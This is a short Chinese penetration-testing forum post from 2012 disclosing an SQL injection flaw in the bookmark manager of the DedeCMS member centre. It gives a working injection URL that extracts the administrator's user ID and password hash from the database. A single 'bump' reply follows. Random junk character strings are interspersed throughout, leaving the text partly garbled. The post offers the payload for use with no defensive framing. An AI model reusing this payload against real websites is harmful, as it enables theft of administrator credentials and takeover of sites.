中国网络渗透测试联盟
标题:
DedeCMS会员中心书签管理SQL注射漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:21
标题:
DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
3 i. w+ P+ Z- S7 m; d* W
需要magic_quotes_gpc = Off
) r, ?0 A3 u2 o0 n+ b) R: E, g
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
' M" K1 h; e/ h" d$ J
7 f/ r: ]! l6 G! ^' D
DedeCMS会员中心书签管理SQL注射漏洞
7 @1 N- {! I2 S: X {
成功利用该漏洞可获得管理员密码
6 Q& t) N, X2 Z5 L8 ~3 n( W
* \! d, O5 ]1 g2 A
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
: u+ Z; ]* N' [% N( s9 A5 J# b/ B- v+ q
* o# w2 F* Y+ q' {8 W6 M B4 K
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
- a+ S M! x' I/ A
作者:
kook
时间:
2013-1-10 01:33
#89 顶起。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2